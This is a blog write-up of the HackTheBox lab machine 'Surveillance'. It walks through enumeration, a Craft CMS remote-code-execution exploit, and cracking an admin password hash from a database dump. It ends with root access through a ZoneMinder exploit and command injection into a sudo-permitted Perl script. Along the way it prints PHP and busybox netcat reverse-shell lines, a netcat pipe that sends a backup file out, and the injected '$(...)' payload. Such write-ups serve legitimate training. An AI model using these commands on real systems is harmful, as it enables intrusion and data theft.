Willem Medendorp's Blog

Willem Medendorp's Blog

Surveillance

📅
🏷️ [Machine,HackTheBox]

Intro

The box seems to be for a surveillance camera service. It does not give a clear indicator for what a foothold would be.

Discovery

The website seems to be hosted by Craft CMS. The page source does not revail anything instersting. just basic markup. demo@surveillance.htb is an email. No other links initial nmap is quite sparse 

sudo nmap -sC -sV -oA nmap surveillance.htb
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-12 22:25 CET
Nmap scan report for surveillance.htb (10.10.11.245)
Host is up (0.026s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 96071cc6773e07a0cc6f2419744d570b (ECDSA)
|_  256 0ba4c0cfe23b95aef6f5df7d0c88d6ce (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title:  Surveillance 
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.98 seconds

We have to try some more enumeration. http://surveillance.htb/admin/login gives a login page.

The latest release of craft seems to be 4.6.0 Whilst the home page suggest it is running 4.4.14 In the release notes for 4.5.14 they mention: Fixed a privilege escalation vulnerability. So this is something we have to use later on. In 4.5.12 again Fixed a privilege escalation vulnerability. 4.5.7 aswell. 4.5.6 seems to contains a RCE Fixed an RCE vulnerability.

Lets have a try at this.

Getting user

https://gist.github.com/to016/b796ca3275fa11b5ab9594b1522f7226

This poc first failed, but seemed to be update by the time I came back to this machine and now gives a shell

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Lets first setup a more stable reverse shell We started a new reverse shell using php 

php -r '$sock=fsockopen("10.10.14.137",9000);exec("sh <&3 >&3 2>&3");'

We upgraded this shell and can now start looking around

The folder in which we start seem to contain mostly random web files. By doing find . we can quickly see all directory contents

Up we go up some directories we find a /storage directory, we do find on that and see storage/backups/surveillance--2023-10-17-202801--v4.4.14.sql.zip that might be interesting.

Database dump

We setup a new netcat connection

 host: nc -lp 9001 -q 1 > baseout

on the machine we then encode it using base64 and send it

machine: cat ./storage/backups/surveillance--2023-10-17-202801--v4.4.14.sql.zip | base64 | nc 10.10.14.137 9001

On our host we can now decode it and unzip

base64 -d baseout > data.zip && unzip data.zip

Searching for a password or username

INSERT INTO `searchindex` VALUES (1,'email',0,1,' admin surveillance htb '),(1,'firstname',0,1,' matthew '),(1,'fullname',0,1,' matthew b '),(1,'lastname',0,1,' b '),(1,'slug',0,1,''),(1,'username',0,1,' admin '),(2,'slug',0,1,' home '),(2,'title',0,1,' home '),(7,'slug',0,1,' coming soon '),(7,'title',0,1,' coming soon ');
/*!40000 ALTER TABLE `searchindex` ENABLE KEYS */;
UNLOCK TABLES;
commit;

Maybe we can find matthew password somewhere

This seems like the admin entry:

LOCK TABLES `users` WRITE;
/*!40000 ALTER TABLE `users` DISABLE KEYS */;
set autocommit=0;
INSERT INTO `users` VALUES (1,NULL,1,0,0,0,1,'admin','Matthew B','Matthew','B','admin@surveillance.htb','39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec','2023-10-17 20:22:34',NULL,NULL,NULL,'2023-10-11 18:58:57',NULL,1,NULL,NULL,NULL,0,'2023-10-17 20:27:46','2023-10-11 17:57:16','2023-10-17 20:27:46');
/*!40000 ALTER TABLE `users` ENABLE KEYS */;
UNLOCK TABLES;
commit;

Where 39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec is the password hash.

Cracking the password

Using hashid we can to discover what type of hash it is.

hashid 39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec

SHA-256 seems te most likely

We can try and crack it using hashcat.

hashcat -m 1400 -a 0 hash /usr/share/wordlist/rockyou.txt

And we find it: 39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec:starcraft122490

user:matthew pass: starcraft122490 we login via ssh. And we get the user flag: ff5294207dafe5b5ca1ff61f1bfc5ddb

Root

In the user dir we can not see anything special so we should try and get some enumeration on here. We upload linpeas via our default approach and run it.

Linpeas

There seems to be a second user with a console: zoneminder:x:1001:1001:,,,:/home/zoneminder:/bin/bash Along with it there seems to be more nginx configuration for zm (zoneminder)

Probing arround

If we do curl localhost:8080 We get served a page of zoneminder application this will probably be our way forward.

There seems to be a poc available https://github.com/rvizx/CVE-2023-26035 If we want to use the exploit we must first forward to port to our host 

ssh -L 8080:localhost:8080 matthew@surveillance.htb

Then we again setup a nc lisener and execute the poc

nc -lvnp 9000

python root-exploit.py -t http://localhost:8080 -ip 10.10.14.137 -p 9000

And we get a shell as the zoneminder users

Root stage 2

zoneminder does have sudo rights:

sudo -l
Matching Defaults entries for zoneminder on surveillance:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User zoneminder may run the following commands on surveillance:
    (ALL : ALL) NOPASSWD: /usr/bin/zm[a-zA-Z]*.pl *
zoneminder@surveillance:/usr/share/zoneminder/www$

It seems to be clear that we want to inject our command somewhere using one of the *pl. We are however not allowed to create our own files. Lets see what tools we already have.

zmaudit.pl    zmfilter.pl         zmrecover.pl    zmtrack.pl    zmwatch.pl
zmcamtool.pl  zmonvif-probe.pl    zmstats.pl      zmtrigger.pl  zmx10.pl
zmcontrol.pl  zmonvif-trigger.pl  zmsystemctl.pl  zmupdate.pl
zmdc.pl       zmpkg.pl            zmtelemetry.pl  zmvideo.pl

These are all the perl files we can execute as root, one maybe has someway the run commands If we audit the code a bit we find that zmupdate.pl executes a command for which we can easily inject our own shell bits in the for of a user name.

So we create a small script with a reverse shell:

echo "busybox nc 10.10.14.137 9001 -e bash" >> privesc.sh && chmod +x privesc.sh

On our host setup a netcat lisener

nc -lnvp 9001

We then run

sudo /usr/bin/zmupdate.pl --version=1 --user='$(/tmp/privesc.sh)'

And we get a root shell on our new netcat connection 29973ba58778775d0cffc2be10ff92fb

← Back to home

Copyright 2025
Willem Medendorp

made with
and